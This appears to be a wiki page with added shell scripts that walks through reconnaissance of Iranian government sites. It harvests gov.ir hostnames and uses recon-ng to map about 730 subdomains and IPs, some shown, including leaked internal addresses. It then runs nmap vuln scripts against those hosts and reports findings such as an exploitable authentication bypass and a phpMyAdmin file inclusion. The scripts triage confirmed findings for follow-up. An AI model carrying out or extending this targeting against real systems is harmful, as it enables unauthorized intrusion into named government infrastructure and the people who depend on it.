1. Collect the government URLs with the Google search gov site:.ir\\
2. In the vim configuration (.vimrc) define the following command for the clean-up (the first substitution strips the scheme and a leading www., the second a trailing slash; the e flag stops a line with nothing to strip, such as a bare hostname, from aborting the rest of the chain):\\
command! LimpiarUrls %s/^\(http[s]\{0,1\}:\/\/\)\(www\.\)\{0,1\}//e | %s/\/$//e
3. Now pressing Esc and typing :LimpiarUrls in vim leaves the hostnames ready to use in the scanners\\
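The same clean-up as a shell filter, so it can sit in a pipeline between the scraped result list and recon-ng or nmap instead of a vim session. This is an added example, not code from the wiki page; it goes a little beyond the vim command by also lower-casing, dropping any path, port, query or fragment, and removing duplicates. The input lines are constructed for the example (the hostnames are taken from the list on this page).

```shell
#!/bin/sh
# Added example, not from the wiki page: the clean-up LimpiarUrls does in vim,
# as a shell filter. stdin: one URL or hostname per line; stdout: unique bare
# hostnames, lower-cased and sorted.
clean_urls() {
    # 1. case-fold (hostnames and the scheme are case-insensitive)
    # 2. strip the scheme, a leading www., everything from the first / : ? or #,
    #    and a trailing dot (FQDN form)
    # 3. keep only lines shaped like a hostname, then dedupe
    tr '[:upper:]' '[:lower:]' \
    | sed -E -e 's|^[[:space:]]*https?://||' \
             -e 's|^www\.||' \
             -e 's|[/:?#].*$||' \
             -e 's|\.$||' \
    | grep -E '^[a-z0-9.-]+\.[a-z]{2,}$' \
    | sort -u
}

sample_google_urls() {
    # Constructed input in the shapes a copy-paste from Google results produces;
    # the hostnames are the ones listed on this page.
    cat <<'EOF'
https://www.tax.gov.ir/
http://my.gov.ir
https://sso.my.gov.ir/login?next=/
HTTPS://President.IR/en/
evisa.mfa.ir:443
tax.gov.ir
https://www.tax.gov.ir/portal/home
not a url at all
EOF
}

# Typical use: pbpaste | clean_urls > urls_gobierno_ir.txt
sample_google_urls | clean_urls
```

The hostname-shape grep at the end is what catches stray text (page titles, snippets) that comes along when results are copied by hand; the three copies of tax.gov.ir collapse to one.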
{{ :iran:urls_gobierno_ir.txt.gz |}}
gunzip -c urls_gobierno_ir.txt.gz
my.gov.ir
sso.my.gov.ir
tax.gov.ir
op.salamat.gov.ir
behdasht.gov.ir
irc.fda.gov.ir
mimt.gov.ir
csp.ihio.gov.ir
women.gov.ir
smttk.gov.ir
naciportal.inso.gov.ir
mfa.gov.ir
evisa.mfa.ir
fata.gov.ir
mcls.gov.ir
epl.irica.gov.ir
mikhak.mfa.gov.ir
hamrah.msy.gov.ir
president.ir
ticketing.ito.gov.ir
caa.gov.ir
tehran.farhang.gov.ir
farhang.gov.ir
{{ :iran:urls_ips_ir_recon_ng.tar.gz |}}\\
**Same procedure as for [[israel:urls-recon-ng|Israel]]: subdomains obtained from the government URLs collected through the Google search gov site:.ir**\\
**IPs and subdomains obtained with recon-ng from the file urls_gobierno_ir.txt**\\
wc -l < url_ip_ir.txt
730
**Quite a lot; the first 10 look like this (note the 172.21.x.x entries: RFC 1918 addresses leaked through DNS, not reachable from the Internet):**\\
head -n 10 url_ip_ir.txt
cp.mfa.gov.ir 109.201.11.102
mail.mfa.gov.ir 109.201.11.102
office.behdasht.gov.ir 172.21.60.201
sibservice95361.behdasht.gov.ir 172.21.66.145
sibservice95362.behdasht.gov.ir 172.21.66.145
hop.behdasht.gov.ir 172.21.66.183
eo.behdasht.gov.ir 172.21.67.127
eoffice.behdasht.gov.ir 172.21.67.127
maternaldeath.behdasht.gov.ir 172.21.67.192
educationportal.behdasht.gov.ir 185.123.208.106
**nmap against the most common and most often vulnerable ports** (-Pn skips host discovery so hosts that drop ICMP are still scanned; 69/tftp and 137/netbios-ns are UDP services, so a TCP scan will always report them closed; the RFC 1918 addresses in the recon-ng list are unreachable and only waste scan time; and scanning by bare IP drops the hostname, so anything behind a CDN or reverse proxy only shows the front end)\\
tar -xOzf urls_ips_ir_recon_ng.tar.gz url_ip_ir.txt | awk '{print $2}' | sort -u | nmap -Pn -sV --script vuln -p 20-23,53,69,80,137,139,443,445,8080,8443 -iL - -oN nmap_vuln_ir_pvarios.txt
**open services**\\
grep -E '^[0-9]+/.*open' nmap_vuln_ir_pvarios.txt | sed -E 's/ {2,}/ /g' | sort -u
443/tcp open ssl/https
443/tcp open ssl/https ArvanCloud
443/tcp open ssl/https LiteSpeed
443/tcp open ssl/tcpwrapped
443/tcp open tcpwrapped
53/tcp open tcpwrapped
8080/tcp open http-proxy ArvanCloud
80/tcp open http LiteSpeed
80/tcp open http Microsoft IIS httpd 10.0
80/tcp open http nginx (reverse proxy)
80/tcp open tcpwrapped
8443/tcp open https-alt
8443/tcp open ssl/https-alt ArvanCloud
**closed services**\\
grep -E '^[0-9]+/.*closed' nmap_vuln_ir_pvarios.txt | sed -E 's/ {2,}/ /g' | sort -u
20/tcp closed ftp-data
21/tcp closed ftp
22/tcp closed ssh
23/tcp closed telnet
445/tcp closed microsoft-ds
53/tcp closed domain
69/tcp closed tftp
8080/tcp closed http-proxy
80/tcp closed http
8443/tcp closed https-alt
**vulnerabilities found** (the NSE vuln scripts print a VULNERABLE: marker followed by the finding's title; these four come from http-method-tamper, ssl-dh-params, http-phpmyadmin-dir-traversal and http-slowloris-check)\\
sed -nE '/VULNERABLE:/{n;p;}' nmap_vuln_ir_pvarios.txt | sort -u
| Authentication bypass by HTTP verb tampering
| Diffie-Hellman Key Exchange Insufficient Group Strength
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| Slowloris DOS attack
State of each one (the State: line follows the title; after sort -u the pairing between finding, host and state is lost, and only VULNERABLE and VULNERABLE (Exploitable) are confirmed results: LIKELY VULNERABLE is what http-slowloris-check reports from its timing heuristic without launching the attack, and UNKNOWN (unable to test) means the script could not run its check):
sed -nE '/VULNERABLE:/{n;n;p;}' nmap_vuln_ir_pvarios.txt | sort -u
| State: LIKELY VULNERABLE
| State: UNKNOWN (unable to test)
| State: VULNERABLE
| State: VULNERABLE (Exploitable)
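The sed one-liners above give the list of titles and the list of states, but not which host and port each finding belongs to or which state goes with which title. An added shell example (not from the page) that parses the -oN report into one tab-separated row per finding and separates confirmed findings from heuristic or untested ones. The embedded report is a constructed excerpt in the layout the NSE vuln scripts use, with the four finding titles and two of the IPs from this page; the host/port pairing and the detail lines are made up for the example.

```shell
#!/bin/sh
# Added example, not from the wiki page: parse nmap -oN output of a --script vuln
# run into rows of  host<TAB>port<TAB>nse-script<TAB>title<TAB>state

parse_nmap_vuln() {
    awk '
        BEGIN { OFS = "\t" }
        /^Nmap scan report for /   { host = $5; next }          # new host block
        /^[0-9]+\/(tcp|udp)/       { port = $1; next }          # port line, e.g. 80/tcp
        /^[|] [A-Za-z0-9_-]+:/     { script = $2; sub(/:$/, "", script); next }  # "| script-name:"
        /^[|] +VULNERABLE:/        { want = 1; next }           # next line is the title
        want == 1                  { title = $0; sub(/^[|] +/, "", title); want = 2; next }
        want == 2 && /State:/      { state = $0; sub(/^.*State: */, "", state)
                                     print host, port, script, title, state; want = 0; next }
    '
}

confirmed_only() {
    # keep VULNERABLE / VULNERABLE (Exploitable); LIKELY VULNERABLE and
    # UNKNOWN (unable to test) still need a manual check
    awk -F'\t' '$5 ~ /^VULNERABLE/'
}

hosts_per_finding() {
    # how many host/port pairs share each finding title, most common first
    awk -F'\t' '{ c[$4]++ } END { for (t in c) print c[t] "\t" t }' | sort -rn
}

sample_nmap_report() {
    # Constructed excerpt of an nmap -oN vuln report (two hosts, four findings).
    cat <<'EOF'
# Nmap 7.94 scan initiated as: nmap -Pn -sV --script vuln -iL targets.txt -oN nmap_vuln_ir_pvarios.txt
Nmap scan report for 109.201.11.102
Host is up (0.12s latency).

PORT     STATE  SERVICE    VERSION
21/tcp   closed ftp
80/tcp   open   http       nginx (reverse proxy)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
443/tcp  open   ssl/https
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|     Check results:
|       WEAK DH GROUP 1
|_            Modulus Length: 1024
Nmap scan report for 185.123.208.106
Host is up (0.20s latency).

PORT     STATE  SERVICE    VERSION
80/tcp   open   http       Microsoft IIS httpd 10.0
| http-method-tamper: 
|   VULNERABLE:
|   Authentication bypass by HTTP verb tampering
|     State: VULNERABLE (Exploitable)
|     Extra information:
|       URIs suspected to be vulnerable to HTTP verb tampering:
|_        /admin/ [GENERIC]
8080/tcp open   http-proxy
| http-phpmyadmin-dir-traversal: 
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: UNKNOWN (unable to test)
|     References:
|_      https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html
EOF
}

# Typical use: parse_nmap_vuln < nmap_vuln_ir_pvarios.txt | confirmed_only
sample_nmap_report | parse_nmap_vuln | confirmed_only
```

Working from the TSV rows rather than the sorted title list keeps each finding tied to its host and port, so the Slowloris "LIKELY VULNERABLE" and the untested phpMyAdmin entry can be set aside while the DH-group and verb-tampering findings go straight to verification.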